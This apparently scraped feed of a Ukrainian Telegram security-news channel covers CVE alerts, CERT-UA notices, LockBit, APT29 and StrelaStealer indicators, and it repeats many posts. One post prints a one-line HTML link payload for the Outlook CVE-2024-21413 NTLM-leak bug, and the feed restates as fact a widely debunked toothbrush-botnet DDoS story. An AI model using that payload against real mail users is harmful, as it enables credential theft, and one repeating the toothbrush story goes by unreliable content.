Forwarded from IT ARMY of Ukraine
🚨 CERT-UA виявило понад 2000 заражених комп'ютерів на одному з держпідприємств! Вірус DIRTYMOE надає віддалений доступ до заражених комп'ютерів тому вкрай небезпечний для підприємств у сфері оборони та інфраструктури.
Вірус використовує вразливості застарілих операційних систем, тому якщо ви маєте такі на вашому підприємстві, то наполегливо радимо:
- або встановити останні моделі ОС
- або відокремити такі комп'ютери (за допомогою VLAN і/або фізичної сегментації) до окремих мережевих сегментів з обов'язковою фільтрацією даних
—
🚨 CERT-UA detected over 2000 infected computers at a state enterprise! DIRTYMOE virus grants remote access to infected PCs, posing a critical threat to defense and infrastructure sectors.
The virus exploits vulnerabilities in outdated OS. If your enterprise uses such systems, we strongly advise either:
- Upgrading to the latest OS models
- Isolating these computers into separate network segments using VLAN and/or physical segmentation with mandatory data filtering
Вірус використовує вразливості застарілих операційних систем, тому якщо ви маєте такі на вашому підприємстві, то наполегливо радимо:
- або встановити останні моделі ОС
- або відокремити такі комп'ютери (за допомогою VLAN і/або фізичної сегментації) до окремих мережевих сегментів з обов'язковою фільтрацією даних
—
🚨 CERT-UA detected over 2000 infected computers at a state enterprise! DIRTYMOE virus grants remote access to infected PCs, posing a critical threat to defense and infrastructure sectors.
The virus exploits vulnerabilities in outdated OS. If your enterprise uses such systems, we strongly advise either:
- Upgrading to the latest OS models
- Isolating these computers into separate network segments using VLAN and/or physical segmentation with mandatory data filtering
cert.gov.ua
CERT-UA
Урядова команда реагування на комп’ютерні надзвичайні події України, яка функціонує в складі Державної служби спеціального зв’язку та захисту інформації України.
🎫 IntroLabs. Практичні завдання та посібники для фахівців з інформаційної безпеки.
Intro To SOC:
- Linux CLI;
- Memory Analysis;
- TCPDump;
- Web Log Review;
- WindowsCLI;
- Wireshark;
- RITA;
- Nessus;
- DeepBlueCLI;
- Domain Log Review;
- Velociraptor;
- Elk In The Cloud;
- Elastic Agent;
- Sysmon in ELK;
Intro To Security:
- Applocker;
- Bluespawn;
- DeepBlueCLI;
- Nessus;
- Nmap;
- Password Cracking;
- Password Spraying;
- Responder;
- RITA;
- Sysmon;
- Web Testing;
Cyber Deception/Active Defense:
- Spidertrap;
- Cowrie;
- Canarytokens;
- RITA;
- Bluespawn;
- Portspoof;
- HoneyBadger;
- HoneyShare;
- HoneyUser;
- AdvancedC2;
- WebHoneypot;
- File Audit.
Intro To SOC:
- Linux CLI;
- Memory Analysis;
- TCPDump;
- Web Log Review;
- WindowsCLI;
- Wireshark;
- RITA;
- Nessus;
- DeepBlueCLI;
- Domain Log Review;
- Velociraptor;
- Elk In The Cloud;
- Elastic Agent;
- Sysmon in ELK;
Intro To Security:
- Applocker;
- Bluespawn;
- DeepBlueCLI;
- Nessus;
- Nmap;
- Password Cracking;
- Password Spraying;
- Responder;
- RITA;
- Sysmon;
- Web Testing;
Cyber Deception/Active Defense:
- Spidertrap;
- Cowrie;
- Canarytokens;
- RITA;
- Bluespawn;
- Portspoof;
- HoneyBadger;
- HoneyShare;
- HoneyUser;
- AdvancedC2;
- WebHoneypot;
- File Audit.
Три мільйони зубних щіток здійснили DDoS-атаку на Швейцарську компанію, через що вона втратила мільйони євро.
Вони запускали на щітках вірусне програмне забезпечення, що виявилося нескладно, оскільки їх ОС була розроблена на Java.
Можливо, та ваша стара розумна щітка, якою ви не користуєтеся, є спільником.
Вони запускали на щітках вірусне програмне забезпечення, що виявилося нескладно, оскільки їх ОС була розроблена на Java.
Можливо, та ваша стара розумна щітка, якою ви не користуєтеся, є спільником.
❗️Компанія Fortinet розкрила новий критичний недолік безпеки в FortiOS SSL VPN.
Вразливість CVE-2024-21762 (оцінка CVSS: 9,6) дозволяє виконувати довільний код і команди.
"A out-of-bounds write vulnerability [CWE-787] in FortiOS may allow a remote unauthenticated attacker to execute arbitrary code or command via specially crafted HTTP requests," the company said in a bulletin released Thursday.
It further acknowledged that the issue is "potentially being exploited in the wild," without giving additional specifics about how it's being weaponized and by whom.
https://thehackernews.com/2024/02/fortinet-warns-of-critical-fortios-ssl.html?m=1
Вразливість CVE-2024-21762 (оцінка CVSS: 9,6) дозволяє виконувати довільний код і команди.
"A out-of-bounds write vulnerability [CWE-787] in FortiOS may allow a remote unauthenticated attacker to execute arbitrary code or command via specially crafted HTTP requests," the company said in a bulletin released Thursday.
It further acknowledged that the issue is "potentially being exploited in the wild," without giving additional specifics about how it's being weaponized and by whom.
https://thehackernews.com/2024/02/fortinet-warns-of-critical-fortios-ssl.html?m=1
Microsoft February 2024 Patch Tuesday fixes 2 zero-days, 74 flaws
Сьогодні патч-вівторок Microsoft за лютий 2024 року, який включає оновлення безпеки для 74 недоліків і двох активно експлуатованих Zero-days.
Кількість багів у кожній категорії вразливостей вказана нижче:
- 16 Elevation of Privilege Vulnerabilities
- 3 Security Feature Bypass Vulnerabilities
- 30 Remote Code Execution Vulnerabilities
- 5 Information Disclosure Vulnerabilities
- 9 Denial of Service Vulnerabilities
- 10 Spoofing Vulnerabilities
https://www-bleepingcomputer-com.cdn.ampproject.org/c/s/www.bleepingcomputer.com/news/microsoft/microsoft-february-2024-patch-tuesday-fixes-2-zero-days-74-flaws/amp/
Сьогодні патч-вівторок Microsoft за лютий 2024 року, який включає оновлення безпеки для 74 недоліків і двох активно експлуатованих Zero-days.
Кількість багів у кожній категорії вразливостей вказана нижче:
- 16 Elevation of Privilege Vulnerabilities
- 3 Security Feature Bypass Vulnerabilities
- 30 Remote Code Execution Vulnerabilities
- 5 Information Disclosure Vulnerabilities
- 9 Denial of Service Vulnerabilities
- 10 Spoofing Vulnerabilities
https://www-bleepingcomputer-com.cdn.ampproject.org/c/s/www.bleepingcomputer.com/news/microsoft/microsoft-february-2024-patch-tuesday-fixes-2-zero-days-74-flaws/amp/
New critical Microsoft Outlook RCE bug is trivial to exploit
Оновлення 14 лютого, 16:50 за східним часом: статтю та назву переглянуто після того, як корпорація Майкрософт відкликала оновлення «активна експлуатація», додане до рекомендацій CVE-2024-21413.
«Зловмисник може створити шкідливе посилання, яке обходить протокол захищеного перегляду, що призводить до витоку локальної облікової інформації NTLM і віддаленого виконання коду (RCE)».
Оновлення 14 лютого, 16:50 за східним часом: статтю та назву переглянуто після того, як корпорація Майкрософт відкликала оновлення «активна експлуатація», додане до рекомендацій CVE-2024-21413.
«Зловмисник може створити шкідливе посилання, яке обходить протокол захищеного перегляду, що призводить до витоку локальної облікової інформації NTLM і віддаленого виконання коду (RCE)».
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
Threats Monitoring 🇺🇦
New critical Microsoft Outlook RCE bug is trivial to exploit Оновлення 14 лютого, 16:50 за східним часом: статтю та назву переглянуто після того, як корпорація Майкрософт відкликала оновлення «активна експлуатація», додане до рекомендацій CVE-2024-21413.…
Microsoft Outlook RCE: PoC
Вразливість, виявлена Check Point, отримала позначення CVE-2024-21413. Вона активується при відкритті листів зі шкідливими посиланнями у вразливих версіях Outlook. Вразливість зачіпає кілька продуктів Office, включаючи Microsoft Office LTSC 2021, Microsoft 365 для підприємств, а також Microsoft Outlook 2016 та Microsoft Office 2019
Proof Of Concept
Вразливість, виявлена Check Point, отримала позначення CVE-2024-21413. Вона активується при відкритті листів зі шкідливими посиланнями у вразливих версіях Outlook. Вразливість зачіпає кілька продуктів Office, включаючи Microsoft Office LTSC 2021, Microsoft 365 для підприємств, а також Microsoft Outlook 2016 та Microsoft Office 2019
Proof Of Concept
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
Щодо обстановки в сфері кібер на 23-24 лютого 2024 року
Ураховуючи численні запити щодо можливості здійснення кібератак 23-24 лютого 2024 року, з огляду на події 23.02.2022 та 23.02.2023, інформуємо про таке.
https://cert.gov.ua/article/6277822
Ураховуючи численні запити щодо можливості здійснення кібератак 23-24 лютого 2024 року, з огляду на події 23.02.2022 та 23.02.2023, інформуємо про таке.
https://cert.gov.ua/article/6277822
cert.gov.ua
CERT-UA
Урядова команда реагування на комп’ютерні надзвичайні події України, яка функціонує в складі Державної служби спеціального зв’язку та захисту інформації України.
This media is not supported in your browser
VIEW IN TELEGRAM
Корисні розширення для роботи OSINT
Instant Data Scraper — експортує виділені дані зі сторінок у файли Excel або CSV.
Copyfish — виділяє, копіює та перекладає текст із відео, зображення чи PDF, і не забуваємо про розширення Google Translate
MapSwitcher — показує, який вигляд має виділене місце / координати на карті на кількох інших мапах з переліку MapSwitcher.
Telegram groups and channels search tool — пошук згадок про Tg-групи і чати за ключовими словами у різних соцмережах або на іншому сервісі (можна додати до переліку).
Threats Monitoring 🇺🇦
Instant Data Scraper — експортує виділені дані зі сторінок у файли Excel або CSV.
Copyfish — виділяє, копіює та перекладає текст із відео, зображення чи PDF, і не забуваємо про розширення Google Translate
MapSwitcher — показує, який вигляд має виділене місце / координати на карті на кількох інших мапах з переліку MapSwitcher.
Telegram groups and channels search tool — пошук згадок про Tg-групи і чати за ключовими словами у різних соцмережах або на іншому сервісі (можна додати до переліку).
Threats Monitoring 🇺🇦
UAC-0149: Цільові вибіркові атаки у відношенні Сил оборони України із застосуванням COOKBOX (CERT-UA#9204)
Урядовою командою реагування на компютерні надзвичайні події України CERT-UA у взаємодії з Центром кібернетичної безпеки інформаційно-телекомунікаційних систем військової частини А0334 (ЦКБ ІТС в/ч А0334) вжито заходів з дослідження цілеспрямованої кібератаки, що полягала у спробі ураження шкідливим програмним забезпеченням ЕОМ представників Сил оборони України.
https://cert.gov.ua/article/6277849
Урядовою командою реагування на компютерні надзвичайні події України CERT-UA у взаємодії з Центром кібернетичної безпеки інформаційно-телекомунікаційних систем військової частини А0334 (ЦКБ ІТС в/ч А0334) вжито заходів з дослідження цілеспрямованої кібератаки, що полягала у спробі ураження шкідливим програмним забезпеченням ЕОМ представників Сил оборони України.
https://cert.gov.ua/article/6277849
cert.gov.ua
CERT-UA
Урядова команда реагування на комп’ютерні надзвичайні події України, яка функціонує в складі Державної служби спеціального зв’язку та захисту інформації України.
Оновлення LockBit шифрувальника
Як вперше повідомив Zscaler, група програм-вимагачів оновила нотатки про викуп свого шифрувальника URL-адресами Tor для нової інфраструктури. Пізніше BleepingComputer знайшов зразки шифрувальників, завантажених у VirusTotal учора [Зразок] (поділився MalwareHunterTeam) і сьогодні [Зразок], які містять оновлені нотатки про викуп.
Незабаром після цього LockBit створив новий сайт для витоку даних і залишив довгу записку на адресу ФБР, у якій стверджував, що правоохоронні органи зламали їхні сервери за допомогою помилки PHP.
Як вперше повідомив Zscaler, група програм-вимагачів оновила нотатки про викуп свого шифрувальника URL-адресами Tor для нової інфраструктури. Пізніше BleepingComputer знайшов зразки шифрувальників, завантажених у VirusTotal учора [Зразок] (поділився MalwareHunterTeam) і сьогодні [Зразок], які містять оновлені нотатки про викуп.
Незабаром після цього LockBit створив новий сайт для витоку даних і залишив довгу записку на адресу ФБР, у якій стверджував, що правоохоронні органи зламали їхні сервери за допомогою помилки PHP.
АНОНС: Практичний семінар для кіберфахівців
Система кіберзахисту держави – це синергія якісної аналітики основних суб’єктів забезпечення кібербезпеки та компетенцій кіберфахівців кожної без виключення інформаційно-комунікаційної системи країни, включаючи механізми оперативного обміну інформацією, протоколи реагування та ін.
https://cert.gov.ua/article/6277896
Система кіберзахисту держави – це синергія якісної аналітики основних суб’єктів забезпечення кібербезпеки та компетенцій кіберфахівців кожної без виключення інформаційно-комунікаційної системи країни, включаючи механізми оперативного обміну інформацією, протоколи реагування та ін.
https://cert.gov.ua/article/6277896
cert.gov.ua
CERT-UA
Урядова команда реагування на комп’ютерні надзвичайні події України, яка функціонує в складі Державної служби спеціального зв’язку та захисту інформації України.
Зміни в Microsoft Patch Tuesday
Elevation of Privilege - Ядро Windows (CVE-2024-21338) піднялося на 3-е місце. Дослідники з Avast опублікували статтю, в якій стверджують, що вразливістю скористалися лиходії з Lazarus. Корпорація Майкрософт також виставила прапор експлуатації цієї вразливості.
Elevation of Privilege - Ядро Windows (CVE-2024-21338) піднялося на 3-е місце. Дослідники з Avast опублікували статтю, в якій стверджують, що вразливістю скористалися лиходії з Lazarus. Корпорація Майкрософт також виставила прапор експлуатації цієї вразливості.
Російські шпигуни зламали систему електронної пошти Microsoft і вкрали вихідні коди
Корпорація Microsoft розкрила, що російські урядові хакери, ідентифіковані як група Midnight Blizzard, успішно проникли в її корпоративні системи електронної пошти та викрали вихідні коди.
У повідомленні Microsoft від 8 березня 2024 року детально зазначено, що Midnight Blizzard, також відомий як APT29 або Cosy Bear, використовував інформацію, спочатку викрадену з систем корпоративної електронної пошти компанії, щоб отримати несанкціонований доступ до її внутрішніх систем, включаючи сховища вихідного коду.
Link
Корпорація Microsoft розкрила, що російські урядові хакери, ідентифіковані як група Midnight Blizzard, успішно проникли в її корпоративні системи електронної пошти та викрали вихідні коди.
У повідомленні Microsoft від 8 березня 2024 року детально зазначено, що Midnight Blizzard, також відомий як APT29 або Cosy Bear, використовував інформацію, спочатку викрадену з систем корпоративної електронної пошти компанії, щоб отримати несанкціонований доступ до її внутрішніх систем, включаючи сховища вихідного коду.
Link
Media is too big
VIEW IN TELEGRAM
🧑🏼💻У кіберпросторі багато небезпек, але, на щастя, ми знаємо, як їх оминути, як захиститись. І саме про це будемо розповідати вам і показувати в цьому серіалі. Обіцяємо дієві поради, а в кінці кожного ролику — памʼятку з правилами.
Експертний склад:
— Лілія Сушко, головна інспекторка Кіберполіції України.
— Віталій Якушев, кіберексперт, розкриє та пояснить, чому електронна пошта є такою вразливою.
— Павло Зібров, відомий артист, особисто поділиться своїм досвідом та підкреслить важливість захисту вашої пошти.
Цей матеріал підготовлено в рамках "Всеохопної інформаційно-просвітницької кампанії з протидії дезінформації", що впроваджується 1+1 Media та Smart Angel у співпраці з експертними організаціями за фінансової підтримки Європейського Союзу. Його зміст є виключною відповідальністю редакції програми і не обов'язково відображає позицію ЄС.
Експертний склад:
— Лілія Сушко, головна інспекторка Кіберполіції України.
— Віталій Якушев, кіберексперт, розкриє та пояснить, чому електронна пошта є такою вразливою.
— Павло Зібров, відомий артист, особисто поділиться своїм досвідом та підкреслить важливість захисту вашої пошти.
Цей матеріал підготовлено в рамках "Всеохопної інформаційно-просвітницької кампанії з протидії дезінформації", що впроваджується 1+1 Media та Smart Angel у співпраці з експертними організаціями за фінансової підтримки Європейського Союзу. Його зміст є виключною відповідальністю редакції програми і не обов'язково відображає позицію ЄС.
Large-Scale StrelaStealer Campaign in Early 2024
Шкідливе програмне забезпечення StrelaStealer краде дані входу в електронну пошту від відомих поштових клієнтів і відправляє їх назад на сервер C2 зловмисника. Після успішної атаки суб'єкт загрози отримає доступ до інформації для входу в електронну пошту жертви, яку вони потім можуть використовувати для виконання подальших атак.
IOC SHA256 Hash
DLL
EML
ZIP
JS
C2 server
Шкідливе програмне забезпечення StrelaStealer краде дані входу в електронну пошту від відомих поштових клієнтів і відправляє їх назад на сервер C2 зловмисника. Після успішної атаки суб'єкт загрози отримає доступ до інформації для входу в електронну пошту жертви, яку вони потім можуть використовувати для виконання подальших атак.
IOC SHA256 Hash
DLL
0d2d0588a3a7cff3e69206be3d75401de6c69bcff30aa1db59d34ce58d5f799a
e6991b12e86629b38e178fef129dfda1d454391ffbb236703f8c026d6d55b9a1
EML
f95c6817086dc49b6485093bfd370c5e3fc3056a5378d519fd1f5619b30f3a2e
aea9989e70ffa6b1d9ce50dd3af5b7a6a57b97b7401e9eb2404435a8777be054
b8e65479f8e790ba627d0deb29a3631d1b043160281fe362f111b0e080558680
ZIP
3189efaf2330177d2817cfb69a8bfa3b846c24ec534aa3e6b66c8a28f3b18d4b
JS
544887bc3f0dccb610dd7ba35b498a03ea32fca047e133a0639d5bca61cc6f45
C2 server
193[.]109[.]85[.]231
Фактор кібербезпеки
Урядовою командою реагування на комп’ютерні надзвичайні події України CERT-UA розроблено інструкцію щодо встановлення двоетапної автентифікації (скорочено "2FA") для деяких месенджерів та інформаційних систем.
https://cert.gov.ua/article/6278274
Урядовою командою реагування на комп’ютерні надзвичайні події України CERT-UA розроблено інструкцію щодо встановлення двоетапної автентифікації (скорочено "2FA") для деяких месенджерів та інформаційних систем.
https://cert.gov.ua/article/6278274
cert.gov.ua
CERT-UA
Урядова команда реагування на комп’ютерні надзвичайні події України, яка функціонує в складі Державної служби спеціального зв’язку та захисту інформації України.